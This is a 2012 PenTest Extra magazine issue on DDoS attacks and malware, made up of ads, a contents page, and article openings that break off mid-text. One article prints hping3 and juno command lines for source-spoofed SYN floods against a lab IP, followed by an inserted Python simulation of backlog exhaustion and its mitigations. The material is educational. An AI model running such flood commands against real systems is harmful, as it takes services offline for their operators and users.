DDoS Attacks




scanning isn’t enough

Nipper Studio: Cyber Security Auditing Software

• Device information remains confidential
• Settings that allow you to hide sensitive information in the report
• Low cost, scalable licensing
• Point and click GUI or CLI scripting
• Audit without network traffic

Device Auditing: Nipper Studio (audit without network traffic) compared with scanners

Authentication Configuration
Authorization Configuration
Accounting/Logging Configuration
Intrusion Detection/Prevention Configuration
Password Encryption Settings
Timeout Configuration
Routing Configuration
Physical Port Audit
VLAN Configuration
Network Address Translation
Network Protocols
Device Specific Options
Time Synchronization
Warning Messages (Banners) *
Network Administration Services *
Network Service Analysis *
Password Strength Assessment *
Software Vulnerability Analysis *
Network Filtering (ACL) Audit *
Wireless Networking *
VPN Configuration *

* Limitations and constraints will prevent a detailed audit

Multi-Platform Support for

“It was refreshing to discover Nipper and to find that it supported so many devices that Cisco produces. Nipper enables Cisco to test these devices in a fraction of the time it would normally take to perform a manual audit. For many devices, it has eliminated the need for a manual audit to be undertaken altogether.” (Cisco)

Business Benefits to Cisco
• Nipper quickly produces detailed reports, including known vulnerabilities.
• By using Nipper, manual testing has been altogether eliminated for particular Cisco devices.

Nipper Studio reduces manual auditing time by quickly producing a consistent, clear and detailed report. This report will:

1. Summarize your network’s security
2. Highlight vulnerabilities in your device configurations
3. Rate vulnerabilities by potential system impact and ease of exploitation (using CVSSv2 or the established Nipper Rating System)
4. Provide an easy-to-action mitigation plan based on customizable settings that reflect your organization’s systems and concerns.
5. Allow you to add previous reports and enable change tracking functionality. You can then easily view the progress of your network security.

… for free at enquiries@titania.com
T: +44 (0)845 652 0621
www.titania.com


CONTENTS

Dear Readers,

PenTest Extra tries to select topics that need extra attention. In every field there are obvious things, easy aspects, “everyone-knows-how-to-do-this” issues. DDoS Attacks are one of them. Everyone has heard about them, everyone thinks that DDoS is a topic that can't surprise. PenTest accepted the challenge and dares to say that this issue provides valuable articles worth your time and money. Six articles in the section “DDoS” will endeavor to make of DDoS the most informative, eye-opening and interesting section ever. We start with Deniz Eren's article “How to Perform DDoS Attacks and Mitigation”. This great tutorial will lead you through the attack's types and tools along with deeper explanation of mitigation techniques. The next article, “Penetration with DDoS Attacks”, supplements the previous one and makes sure that a reader will be from now on able to look beyond “the raw statistics”. Ramiro Caire provides a practical tour with two types of attacks – "SYN flood" and "Slow HTTP DDoS Attack". Jeremy Nicholls' article is business oriented and elaborates on democratisation of DDoS and provides an answer to the question “Why Should Business Care about DDoS”? Pierluigi Paganini, you are well familiar with this great author, proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. His article also includes a specific part on the new factors that could support DDoS attacks such as the introduction of IPv6 protocol and the diffusion of mobile platforms. For a dessert we propose an article concerning CoD4 servers usage to launch DDoS attacks against innocent web sites. This is definitely not all we have prepared for PenTest Extra Readers. The “Malware” section includes three articles. Timothy Nolan, also known to you and our great contributor, prepared for you an article about “Defending Against Malicious Code & Malicious Activity For The Non-Reversing Defender”. Do you have a Facebook profile? Of course, you do. The next article will make you familiar with “Facebook Threats”. The last article in this section is devoted to “Vulnerabilities in Common Platforms and Lax Security Practices”. Have you heard about Baltic Cyber Shield? Hannes Holm gives you a great summary of the research that was a result of red team versus blue team exercises. The “Interview” section guests Colin Doherty, President of Arbor Networks, the world leader in DDoS mitigation solutions. In the “Review” Section you can learn about Sucuri – a company that will remotely crawl your website and check for malicious code, defacements, phishing sites, blacklisting status and a host of other undesirable elements. I hope that you will find this issue worthwhile. If you have any suggestions for us concerning topics, problems you want to read about or people you would like to know better thanks to PenTest please, feel free to contact us at en@pentestmag.com.

Enjoy reading!
Malgorzata Skora & PenTest Team

DDoS

06 How To Mitigate DDoS Attacks? Introduction to DDoS Cyberwar Tool
By Deniz Eren
This article's purpose is to give a brief description of DDoS attack types and the tools used by attackers; after that, I will give a deeper explanation of mitigation techniques against DDoS attacks.

16 Penetrating with DDoS Attacks
By Charalampos Z. Patrikakis and Angelos-Christos Anadiotis
You know, or at least you have heard about them, and you may even know the way to protect against it (or try to confront the attackers). But, are you sure you have considered the magnitude of the problem? Have you ever looked into the problem from a distance, to see the actual importance beyond raw statistics on attacks?

24 DDoS: Coordinated Attacks Analysis
By Ramiro Caire
This article will cover some concepts about a well-known attack named DDoS (Distributed Denial-of-Service), with some lab demonstrations as a “Proof of Concept” together with countermeasures. In this paper we will focus on two types of attacks: "SYN flood" and "Slow HTTP DDoS Attack".

32 Why Should Businesses Care about DDoS
By Jeremy Nicholls
The risk of DDoS attacks has increased in tandem with the proliferation of DDoS attack tools and services. This article provides an overview of a number of these tools in order to both raise awareness of the diversity of attacks and provide a window into the underground DDoS economy itself.

40 DDoS Attacks: So Simple, So Dangerous
By Pierluigi Paganini
The article proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. The discussion is supported with the statistics provided by the principal security firms that provide solutions to protect infrastructures from this kind of attack.

46 Sites Fall Prey to Botnet of Call of Duty 4 Game Servers!
By Reto Muller
Administrators of CoD4 servers must be aware of the fact that their machines can be, and are being, used to launch DDoS attacks against innocent web sites.

EXTRA 05/2012(9)


http://pentestmag.com


CONTENTS

Malware

48 Defending Against Malicious Code & Malicious Activity For The Non-Reversing Defender
By Timothy Nolan
It will provide information about resources that exist to provide early warning of newly emerging vulnerabilities and threats, to arm the security analyst with the information necessary to effectively defend and protect their networks and systems.

66 Facebook Threats: Evolution in the Last Few Months
By Niranjan Jayanand
In 2012 we saw malware authors still not giving up and trying to affect Facebook and other users, luring them into clicking anonymous links which result in scamming and spamming across the victim's contacts. In this article you will learn about four tricks used by Facebook malware authors.

78 Vulnerabilities in Common Platforms and Lax Security Practices Are Making Criminals’ Lives Easier
By Andrew Browne
In late 2008, the Conficker worm spread far and wide by exploiting a vulnerability in a network service (MS08-067[1]) that allowed a successful attacker to run malicious code on a compromised machine.

Research

80 Baltic Cyber Shield: Research from a Red Team versus Blue Team Exercise
By Hannes Holm
This article describes one of the few red team versus blue team exercises to date that focused on producing research, namely the Baltic Cyber Shield (BCS). Various studies have been conducted based on the data gathered during this exercise; this article describes two of them.

Interview

88 Interview with Colin Doherty – President, Arbor Networks
By Aby Rao
Threats are complex and the hacking community is innovating at a pace that we have not seen before. DDoS requires a purpose-built solution. You cannot effectively re-deploy existing security solutions like a firewall and expect them to perform the core function they were designed for AND solve the DDoS problem.

Review

92 What you see is not always what you get in the world of drive-by hacking: Sucuri Solutions
By Jim Halfpenny

TEAM
Supportive Editor: Małgorzata Skóra malgorzata.skora@pentestmag.com
Product Manager: Małgorzata Skóra malgorzata.skora@pentestmag.com
Betatesters / Proofreaders: Ed Werzyn, Johan Snyman, Jeff Weaver, William Whitney, Marcelo Zúniga Torres, Harish Chaudhary, Steven Wierckx, Stefanus Natahusada, Gareth Watters, Wilson Tineo Moronta, Emiliano Piscitelli, Dyana Pearson, David Kosorok
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca andrzej.kuca@software.com.pl
Publisher: Software Press Sp. z o.o. SK, 02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.pentestmag.com

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used … program by …
Mathematical formulas created by Design Science MathType™

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.




DDoS

How To Mitigate DDoS Attacks? Introduction to DDoS Cyberwar Tool

This article's purpose is to give a brief description of DDoS attack types and the tools used by attackers; after that, I will give a deeper explanation of mitigation techniques against DDoS attacks.

Before going deep into mitigation, we should know which types of common attacks exist and which tools are used to simulate these attacks. It is important to understand the roots of attacks in order to mitigate them.

Attack Types

TCP SYN Flooding Attacks

As mentioned in RFC 4987, the TCP SYN flood weakness was first discovered in 1994 by Bill Cheswick and Steve Bellovin. They included and then removed a paragraph about the attack in their book "Firewalls and Internet Security: Repelling the Wily Hacker". Two years after the attack was described, an exploit tool was released in Phrack Magazine. Shortly afterwards, TCP SYN flooding attacks started to be observed in the real world and caused service outages.

In order to understand the attack, first we should understand how a TCP connection is established. It is done in three steps:

• Client sends SYN request to server
• Server responds with SYN-ACK packet
• Client sends ACK packet, and the TCP connection is established

In a TCP SYN flood attack, an attacker sends a sequence of SYN requests and the server sends SYN-ACK packets in return; after that the server waits for the ACK response and keeps the half-open connections in its backlog queue. If the server's backlog queue is filled, the server cannot respond to new connections. Since an attacker can send source-IP-spoofed SYN packets very fast, this queue can be filled very fast with tools like hping, juno, etc. This may result in a non-responding server after a while.

Example attacks

SYN flood from a random source IP: spoofed SYN packets to all ports starting from the 23rd port of the victim.

$ hping3 --rand-source -p ++22 --flood -S 192.168.0.27

SYN flood from an attacker's IP to port 22 of victim. With making little changes in source code of juno some other capabilities could be added.

$ ./juno 192.168.0.27 22
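The backlog behaviour described above, as an added Python model written for this edition (it is not code from the original article, nor from hping or juno): each spoofed SYN holds a backlog slot for the full SYN-RECEIVED timer, so a legitimate client is refused once the slots are gone, while two of the countermeasures RFC 4987 lists, a shorter timer and SYN cookies, keep the server reachable. The `Backlog` class, `run_flood_scenario`, `time_to_fill`, the 128-slot backlog, the 10 SYN/s rate and the client address are all constructed for the demonstration.

```python
"""Model of a TCP listen backlog under a SYN flood.

Added example, not code from the original article. Each half-open (SYN_RECV)
entry holds a backlog slot until the peer's ACK arrives or the server gives up
after `retry_timeout` seconds. Spoofed-source SYNs never complete, so they hold
their slot for the full timeout. The two mitigations modelled (a shorter
SYN-RECEIVED timer and SYN cookies) are standard ones from RFC 4987; the rates,
sizes and addresses below are constructed for the demonstration.
"""
from dataclasses import dataclass, field


@dataclass
class Backlog:
    size: int                  # slots available for half-open connections
    retry_timeout: float       # seconds a SYN_RECV entry waits for its ACK
    syn_cookies: bool = False  # True: encode state in the SYN-ACK, keep nothing locally
    half_open: dict = field(default_factory=dict)   # source -> expiry time
    dropped: int = 0           # SYNs the server could not answer
    established: list = field(default_factory=list)

    def _expire(self, now: float) -> None:
        """Free slots whose SYN-RECEIVED timer has run out (the server gave up)."""
        for src in [s for s, exp in self.half_open.items() if exp <= now]:
            del self.half_open[src]

    def on_syn(self, src: str, now: float) -> bool:
        """Handshake steps 1 and 2: return True if the server can send a SYN-ACK."""
        self._expire(now)
        if self.syn_cookies:
            return True                      # stateless: nothing to fill up
        if len(self.half_open) >= self.size:
            self.dropped += 1                # backlog full: SYN silently dropped
            return False
        self.half_open[src] = now + self.retry_timeout
        return True

    def on_ack(self, src: str, now: float) -> bool:
        """Handshake step 3: complete the connection if the server still knows it."""
        self._expire(now)
        if self.syn_cookies or self.half_open.pop(src, None) is not None:
            self.established.append(src)
            return True
        return False                         # entry timed out or was never stored


def time_to_fill(size: int, syn_rate: float, retry_timeout: float):
    """Seconds until a plain backlog is full under a steady flood, or None if
    entries expire fast enough (rate * timeout <= size) for it never to fill."""
    if syn_rate * retry_timeout <= size:
        return None
    return size / syn_rate


def run_flood_scenario(backlog: Backlog, syn_rate: float, duration: float,
                       client: str = "10.0.0.5") -> bool:
    """Constructed trace: `syn_rate` spoofed SYNs per second for `duration`
    seconds (unique sources that never ACK), then one legitimate client
    handshake. Returns True if the legitimate client gets a connection."""
    for i in range(int(syn_rate * duration)):
        backlog.on_syn(f"spoofed-{i}", i / syn_rate)
    t = duration
    if not backlog.on_syn(client, t):
        return False
    return backlog.on_ack(client, t + 0.05)   # client answers within 50 ms


if __name__ == "__main__":
    plain = Backlog(size=128, retry_timeout=60.0)
    short = Backlog(size=128, retry_timeout=3.0)
    cookies = Backlog(size=128, retry_timeout=60.0, syn_cookies=True)
    for name, b in (("default timer", plain), ("3 s timer", short), ("SYN cookies", cookies)):
        ok = run_flood_scenario(b, syn_rate=10, duration=30)
        print(f"{name:13s}: legitimate client {'accepted' if ok else 'refused'}, "
              f"{b.dropped} SYNs dropped, {len(b.half_open)} half-open left")
    print("time to fill 128 slots at 10 SYN/s with a 60 s timer:", time_to_fill(128, 10, 60.0))
```

The point of the model is the product rate × timer: a flood of only 10 SYN/s fills a 128-slot backlog in under 13 seconds when entries linger for 60 s, yet never fills it when the server gives up after 3 s, and with SYN cookies there is no table to fill at all. The trade-offs of each countermeasure (a short timer also drops slow legitimate clients; cookies lose some TCP options) are what the mitigation section of an article like this one has to weigh.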

UDP Flooding Attacks

UDP flood attacks follow the same logic: the attacker sends a large number of packets. First we should know what happens when a UDP request is unsuccessful. The user sends a UDP packet to a




DDoS

Penetrating with DDoS Attacks

You know, or at least you have heard about them, and you may even know the way to protect against it (or try to confront the attackers). But, are you sure you have considered the magnitude of the problem? Have you ever looked into the problem from a distance, to see the actual importance beyond raw statistics on attacks?

Well, let’s see: how would you feel if you were assaulted and could not tell anyone about it? According to Kaspersky Lab's Yury Namestnikov: “Organizations rarely publicize the fact that they have been targeted by DDoS attacks in order to protect their reputation” [1]. How would you feel if one individual out of two in your living environment were infected by a contagious disease? According to Kaspersky Security Network, in Q2 2011 almost every second machine (48%) in Indonesia was subjected to a local malware infection attempt. Or how would you feel if your computer and networking infrastructure was experiencing serious problems for more than two months? Again according to the Kaspersky Security Network report for Q2 2011, the longest attack for that period lasted a bit longer than 60 days. Finally, how serious would you consider the damage if your network of 100 million gamers was attacked and put out of service? Well, SONY did suffer from this just a year ago [2]. I think that the facts behind the numbers tell the full story: DDoS attacks are very serious, and in an always, everywhere and anytime connected world they are a real nightmare.

In the rest of this article we will define the notion of denial of service and distributed denial of service attacks, and we will also identify their classification according to related work performed in the field at an academic level. Then, we will provide references to some of the most famous denial of service attacks as well as certain famous tools that have successfully been used in the past. Finally, we will refer to certain countermeasures that can be applied for preventing such attacks, even though no deterministic method has been implemented so far that can identify a sophisticated distributed denial of service attack.

A Bit of Background

According to the WWW Security FAQ [3], “Denial of Service (DoS) is an attack designed to render a computer or network incapable of providing normal services”. Distributed denial of service (DDoS) attacks can be seen as simple DoS ones which are performed by multiple, possibly infected, hosts against the victim service provider. This kind of attack targets the consumption of all available resources of the service provider, especially the ones with finite capacity and low flexibility, such as memory, CPU power and bandwidth. In detail, the WWW Security FAQ provides the following definition for DDoS attacks: “A Distributed Denial of Service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server





DDoS

DDoS: Coordinated Attacks Analysis

This article will cover some concepts about a well-known attack named DDoS (Distributed Denial-of-Service), with some lab demonstrations as a “Proof of Concept” together with countermeasures. In this paper we will focus on two types of attacks: "SYN flood" and "Slow HTTP DDoS Attack".

It is likely that you already know this attack named Distributed Denial-of-Service (DDoS), which is an extension of the classic well-known DoS (Denial of Service) that arises when the target server is overloaded with TCP or UDP requests to a particular service (usually running on port 80, the web service, but this depends on the intentions of the attacker; any service could be vulnerable), leaving it unable to respond to genuine requests. The concept of "Distributed" refers to the fact that these requests are made from hundreds or thousands of infected machines (commonly called "zombies") which are governed by "botnets" (http://en.wikipedia.org/wiki/Botnet) in a coordinated manner at the same time. This is a sum of bandwidth, memory and processing consumption on the target that, generally, no server could handle, ending in a collapse of the targeted service due to the failure to answer each request. The key to success in DDoS attacks is the number of "zombies" available in each botnet. We can say that the greater the number of attacking machines, the worse the attack is. As an example, let’s do the following quick estimate: 3000 hosts * 128 KiB/s (common home-user upstream) = 384000 KiB/s = 375 MiB/s

Figure 1. Client establishes a healthy connection with the server

Figure 2. Crafted packets are sent to the server



DDoS

Why Should Businesses Care about DDoS

The risk of DDoS attacks has increased in tandem with the proliferation of DDoS attack tools and services. This article provides an overview of a number of these tools in order to both raise awareness of the diversity of attacks and provide a window into the underground DDoS economy itself.

The Internet is an ideal destination for like-minded people to come together. This is as true for people who are reaching out to friends, colleagues and strangers to raise money for charity as it is for groups of individuals who plan on using cyber attacks to make political or ideological statements. It is the latter group – ‘hacktivists’ as they have come to be called – who are having a profound impact on today’s security threat landscape. Research from Arbor Networks’ annual Worldwide Infrastructure Security Report (a survey of the Internet operational security community published in February 2012) supports this. Ideologically-motivated hacktivism and vandalism were cited by a staggering 66% of respondents as a motivating factor behind distributed denial-of-service (DDoS) attacks on their businesses. An example would be an attack we saw earlier this year targeting the BBC (British Broadcasting Corporation). The attack took down email and other internet-based services, and the BBC suspected the attack was launched by Iran’s cyber army in a bid to disrupt BBC Persian TV. Likewise, the attack on the Formula 1 website, which took place in response to violent protests in Bahrain ahead of a competition.

Democratisation of DDoS

But it’s not just high-profile, politically-connected organizations which are at risk. Any enterprise operating online – which applies to just about any type and size of business operating in Europe – can become a target, because of who they are, what they sell, who they partner with or for any other real or perceived affiliations. Nobody is immune. In many respects, the Internet underground economy functions in ways that are similar to legitimate sectors of the IT industry. One characteristic shared by both the underground and legitimate sectors is that new technologies, and applications of those technologies, create a self-sustaining cycle of growth and innovation. There has been an explosion of DDoS attack tools and services that empower anyone with an Internet connection and a grievance to launch crippling attacks. The emergence of these tools and services is evidence of an expanding underground economy that is finding new applications and markets for denial of service. These range from one-on-one attack tools that Internet gamers use to take rivals offline, to complex opt-in tools that hacktivists use to take down websites, to tools used by those offering commercial DDoS services, and blended attack tools used to cloak the theft of high-value information.




DDoS

DDoS Attacks: So Simple, So Dangerous

The article proposes an analysis of DDoS attacks, explaining how the offensive technique is used in several contexts to hit strategic targets for different purposes. The discussion is supported with the statistics provided by the principal security firms that provide solutions to protect infrastructures from this kind of attack. The article also includes a specific part on the new factors that could support DDoS attacks, such as the introduction of the IPv6 protocol and the diffusion of mobile platforms.

Although it is relatively easy to organize a DDoS attack, it still represents one of the most feared offensive forms for its ability to interfere with the services provided. DDoS attacks are widely used by hackers and hacktivists, but also represent a viable military option in the event of a cyber attack against critical enemy structures. According to the “Worldwide Infrastructure Security Report” published by Arbor Networks, a leading provider of network security and management solutions, ideologically-motivated ‘hacktivism’ and vandalism are the most readily-identified DDoS motivations. Arbor Networks has provided evidence that in 2011, behind the majority of DDoS attacks, there were groups of hacktivists that involved critical masses in the manifestation of their dissent: 35% reported political or ideological attack motivation, while 31% reported nihilism or vandalism as the attack motivation. Today it is possible to retrieve tools for DDoS attacks freely, such as the famous “low orbit ion cannon” (LOIC), and it is equally simple to rent a botnet for a few tens of dollars; this factor has trans-

Figure 1. Attack Motivations Considered Common or Very Common





DDoS

Sites Fall Prey to Botnet of Call of Duty 4 Game Servers!

Administrators of CoD4 servers must be aware of the fact that their machines can be, and are being, used to launch DDoS attacks against innocent web sites. Any self-respecting admin should place the necessary restrictions and take measures to prevent this awkward situation and not lose face to thugs due to sheer ignorance.

The frontline of DDoS mitigation often presents curious attack scenarios, some not very clever, others truly ingenious in their simplicity. Some attacks are quick and cheap, while some last for ages, hitting at fantastic rates – just like the one we recently mitigated for a client – an online news portal whom someone did not like at all and went all out to try and pound to a pulp. Peaking at 45.67 mpps, the flood proved to be a real challenge to mitigate. Beside the regular sheaf of your ordinary SYN, Connection, UDP or HTTP floods and their multiple variations, you get to see the fruit of devious minds’ inventions and inevitably ask yourself: what would criminal minds think of next?

It’s hard to tell, yet anyone doing business on the Internet should at least have a general understanding of the risks involved: risks associated with someone eyeing their sites for victimization, or designing schemes to use unsuspecting resources to launch a DDoS attack on pre-targeted victims. No, we are not talking about the ordinary botnet here, the one that is purchased by the hour. We are talking about the risks of running a popular title game server, for example, which in our case is used for dark purposes instead of bringing pure joy and entertainment. Hacking relies on finding and exploiting flaws in an application or a connection protocol, or both. A DDoS attack is orchestrated so either network, or

Figure 1. Aggregated Attack Graph of 45.67 mpps successfully mitigated attack




Malware

Defending Against Malicious Code & Malicious Activity For The Non-Reversing Defender

This article will provide information about resources that exist to provide early warning of newly emerging vulnerabilities and threats, to arm the security analyst with the information necessary to effectively defend and protect their networks and systems. It will provide the incident responder with some basic tasks, capabilities, intelligence, and resources to enable the responder to rapidly gain understanding about new emerging threats and new zero-day malicious binaries, about attackers, their motivations, and the infrastructure leveraged in their attacks.

This article is a non-exhaustive description of just some of the resources and activities that an information security analyst can and should use to obtain rapid information about potentially malicious files or activity. This article is purposefully non-exhaustive. There are so many tools, techniques, and resources available that it extends well beyond the capacity of this article, or even this publication, to contain enough information to describe them in any appreciable way. Perhaps these are the subject of many future articles yet to come on this subject. In fact, a deep dive on the features of the malware sandboxes and binary and memory analysis tools could easily be comprehensive articles in and of themselves. This article also deals with the subject in an informal and basic manner, but has enough information to be useful to any security professional combatting malware in their environment.

Early Warning – Resources for Understanding Emerging Vulnerabilities, Threats, and Malicious Code

Information security professionals are constantly having to deal with new and previously unknown malware, sometimes with new capabilities and features. Every day there are new emerging threats, attack techniques, and newly discovered vulnerabilities. It is critical that the security professional stay abreast of information about new threats, types of attack, attack techniques, tools, vulnerabilities, malware, countermeasures, workarounds, patches, and similar information in order to proactively protect their networks. Failure to do so may mean that threats are not realized nor understood until they are already creating loss, damage, disruption and havoc for your organization. In addition, building a capacity for obtaining threat intelligence and reputation information will put you ahead of the curve. You will be able to identify new and unknown malicious activity by attributes and artifacts that you or others have gathered and documented related to previous instances of malicious code or activity. Threat intelligence, which is information related to artifacts from instances of prior compromises, site (domain name and IP address) reputation data, and other items, can be a powerful intelligence base to guide and inform the defender. And there are myriad resources available to assist the defender in understanding what new threat may have befallen them, even if it has never been seen by anyone previously. The intent of this article is to bring some focus to some of the many resources available to the defender, and to show how you don't necessarily have to be a malware reverser or expert-level coder to still be able




Can you afford not to invest in software testing? Put our knowledge and experience to work for you

Training

ps_testware is not only an accredited provider of all ISTQB courses, but also offers certification, on-demand and tailor-made training on structured software testing and related fields, for example agile, requirements and security testing.

Consultancy

ps_testware provides expert advice on software testing, from assessing your current test organization and efficiency to developing a specific security, performance or automation testing strategy or on the job coaching.

Managed Staffing

ps_testware staff consists exclusively of experienced software testers who hold at least one ISTQB-certificate. A pro-active attitude, flexibility and professionalism are at the heart of their daily work on your project.

www.pstestware.com

info@pstestware.com

+32 16 35 93 80

Belgium | France


secureninja.com

Forging IT Security Experts

• Security+ • CISSP® • CEH (Professional Hacking) v7.1 • CAP (Certified Authorization Professional) • CISA • CISM • CCNA Security • CWNA • CWSP • DIACAP • ECSA / LPT Dual Certification • ECSP (Certified Secure Programmer) • EDRP (Disaster Recovery Professional) • CCE (Computer Forensics) • CCNA Security

Expert IT Security Training & Services

• CHFI • ISSEP • Cloud Security • Digital Mobile Forensics • SSCP • Security+ • Security Awareness Training … And more

Free Hotel Offer on Select Boot Camps. Offer ends on Jan 31, 2012 – Call 703-535-8600 and mention code: PentestNinja to secure your special rate.

Welcome Military – Veterans Benefits & GI Bill Post 9/11 Approved WIA (Workforce Investment Act) Approved

www.secureninja.com

703 535 8600

Sign Up & Get Free Quiz Engine From cccure.org



Malware

Facebook Threats: Evolution in the Last Few Months

In 2012 we saw malware authors still not giving up and trying to affect Facebook and other users, luring them into clicking anonymous links which result in scamming and spamming across the victim's contacts. In this article you will learn about four tricks used by Facebook malware authors.

Four tricks used by Facebook malware authors:

• Catchy words promising great videos, resulting in multiple redirections
• Links posted in a friend's chat window, resulting in the download of a file named Picturexx.JPG_www.facebook.com, which is a Facebook worm
• Malicious links asking the victim to install or upgrade to the latest Flash Player
• The LilyJade worm using the CrossRider platform, targeting IE, Firefox and Chrome users (Figure 1)

What We Believe Is the Seed of Multiple Infection

Among a group of friends, the seed of infection comes when one or more users from the group/community visit the public post page of Facebook, where we can see a lot of bogus posts. Some posts come with catchy words like "Hey See This Now", "Watch this", "Celebrity leaked video", "I hate Rihanna after watching this video" etc.

Figure 1. Catchy Words Promising Great Videos Resulting in Multiple Redirections

Figure 2. A Malicious Browser Plugin

Figure 3. A Primary Code Written by Malware Authors to Check the Browser Type

Figure 4. YouTube Plugin installed into Firefox



q: how much does Serenity cost?

a: it’s Priceless. Not stillness, not tranquility, but the serenity to do business online, as one should: unmolested. The site is built and launched, it has started making noise on the marketplace. Web servers are gently humming to the tune of orders ringing in, customers chirping, and purposefulness fulfilled. Life is good, not a cloud in the sky, just the daily, most welcome laborious bustle for earned reward, recognition and ever-growing customer satisfaction leading to loyalty and repeat orders. Word of mouth is you’re getting to be one of the best! GO ON, READ THE REST OF THE STORY...


Malware

Vulnerabilities in Common Platforms and Lax Security Practices Are Making Criminals’ Lives Easier

In late 2008, the Conficker worm spread far and wide by exploiting a vulnerability in a network service (MS08-067[1]) that allowed a successful attacker to run malicious code on a compromised machine.

The worm was discovered on millions of infected machines in November 2008, with the number of infected machines skyrocketing to 10-15 million by January 2009. The media carried frequent reports about the outbreak – this was a major event. Maybe it shouldn’t have been. MS08-067 was patched several months earlier, in October 2008. What happened? How did so many machines fall victim to Conficker? Microsoft’s Windows Update mechanism periodically checks for security updates and applies them automatically if it is properly configured. Ah... Malware attacks continue to plague Windows and Windows applications for a few reasons – the sheer number of users, their general lack of security awareness and numerous exploit opportunities. Fast forward to 2012 and we see that lessons are still being learned the hard way. At the time of writing, r00tbeer[2] made headlines in



Research

Baltic Cyber Shield Research from a Red Team versus Blue Team Exercise

This article describes one of the few red team versus blue team exercises to date that focused on producing research, namely the Baltic Cyber Shield (BCS). Several research studies have been conducted on the data gathered during this exercise; this article describes two of them.

The first study concerns whether the vulnerability of a host influences the time required to capture it; the second study concerns whether cyber security professionals can predict success rates of arbitrary code execution attacks. The first part of this article, however, introduces the reader to BCS itself.

Introduction

Red team versus blue team exercises on the topic of cyber security are employed at various scales and for various purposes, for example in academia for education, at DEFCON for competition and by government agencies for training (an overview of various exercises is given in Table 1). While there is an abundance of exercises, the empirical data produced by them, and consequently the research based on their results, are next to non-existent. This is a serious issue, as this type of data is very hard to capture reliably in the wild. Sure, one could argue that honeypots such as Honeyd can be used to capture attacks. However, the data quality produced by a honeypot is often not sufficient, as they are

Table 1. Cyber Defense Exercises (cyber defense exercise: link)

Annual Cyber Defense Exercise: www.nsa.gov/public_info/press_room/2010/cyber_defense.shtml
CSAW: www.poly.edu/csaw2011
Cyber Security Challenge: cybersecuritychallenge.org.uk/
Cyber Storm: www.dhs.gov/files/training/gc_1204738275985.shtm
DEFCON: www.defcon.org/html/links/dc-ctf.html
Delaware's annual Cyber Security Exercise: dti.delaware.gov/cyberexercise/default.shtml
Mid-Atlantic Regional Collegiate Cyber Defense Competition: midatlanticccdc.org
National Collegiate Cyber Defense Competition: www.nationalccdc.org/
National Cyber League: www.nationalcyberleague.org
Pwn2Own: dvlabs.tippingpoint.com/blog/2011/02/02/pwn2own-2011
UCSB International Capture The Flag: ictf.cs.ucsb.edu/



Availability is everything. Labris DDoS Mitigator


interview

“It is easy to overpromise and underdeliver” Interview with Colin Doherty – President, Arbor Networks

Threats are complex and the hacking community is innovating at a pace that we have not seen before. DDoS requires a purpose-built solution. You cannot effectively re-deploy existing security solutions like a firewall and expect them to perform the core function they were designed for AND solve the DDoS problem.

Aby Rao: You have a lot of experience in the global market and in leading various departments of a company. Please tell us a little bit about your career path.

Colin Doherty: I grew up in Scotland and received a postgraduate degree from the Institute of Marketing in London. My business career has been in product management and sales management. I spent about 16 years working for Nortel globally in a variety of positions, eventually running global business units in Latin America, North America and Europe for broadband and wireless technologies. At Arbor, I came in as SVP for worldwide sales and became company President in 2009.

Please tell us about Arbor Networks and the company's position in the industry as a provider of secure service control solutions.

CD: Arbor Networks is the world leader in DDoS mitigation solutions. Our customers include the vast majority of the world's service providers and many of the largest enterprise networks in operation today. They rely on Arbor to ensure that their networks are resilient and can maintain availability, even while facing a cyber-attack. Arbor's solutions are able to identify and mitigate attacks in real-time, before they impact or disrupt services.

Does Arbor Networks have strategic partnerships with other companies?

CD: Yes, Arbor has many business partnerships. On the technology side, we have a partnership with Alcatel-Lucent in which we embed our mitigation software into their 7750 service routers, enabling Internet Service Providers to have mitigation capabilities at the network perimeter, blocking attacks before they reach customer networks. As we've developed our enterprise business, we've also built a world-class network of distribution and channel partners.

How have you transformed your company during your current tenure as the President?

CD: At the macro level, this has been an incredibly difficult business environment globally, starting in the US and now rolling through Europe and Asia. That said, Arbor's business has exploded in this time-frame, with record growth and prof-



NEXT GENERATION THREAT PROTECTION ONLINE SUMMIT, LIVE 5th SEPTEMBER

Join this free summit to hear industry experts and experienced practitioners discuss the current threat landscape, best prevention techniques and proven implementation methods.

FIND 17 thought leadership webinars LEARN about the latest industry trends SHARE the knowledge

To register for free and view the full lineup go to http://www.brighttalk.com/r/T2j


review

What you see is not always what you get in the world of drive-by hacking

Sucuri Solutions

There are plenty of businesses of all sizes who need a web presence to survive and thrive in the modern world, many of which cannot afford a full-time IT support person, let alone an information security expert. We have seen a paradigm shift in who maintains websites, with modern web applications enabling almost anyone to deploy rich, dynamic web sites.

Keeping a web site up and effective can be a challenge. So what happens when one suffers a compromise? How can you detect and respond when you find out your website is hosting malware, has been defaced or is pumping out spam? Sucuri is a company offering an answer to this problem. The Sucuri website bears the tagline “Protect Your Interwebs!”, and they present a unique offering in this area. Sucuri offers monitoring, alerting, removal and prevention of malware attacks on your web site.

How it works

Sucuri will remotely crawl your website and check for malicious code, defacements, phishing sites, blacklisting status and a host of other undesirable elements. You can receive notifications when content is added or updated, allowing you to keep track of what changes and when. It will also check for key changes to information relating to your website, including the IP address, the domain WHOIS details, SSL certificates and whether your website appears on any of the common blacklists of malicious sites; all of this is important intelligence for ensuring your site is healthy and effective (Figure 1). All of these checks can be scheduled to run periodically to check up on the health of your web site. It is best to repeat checks regularly, as new detection signatures are added frequently as new threats emerge. You have a choice of notification methods including email, Twitter, instant messaging, SMS and a private RSS feed. You can also use the available API to integrate events and notifications into your reporting and monitoring tools.

Diving deeper

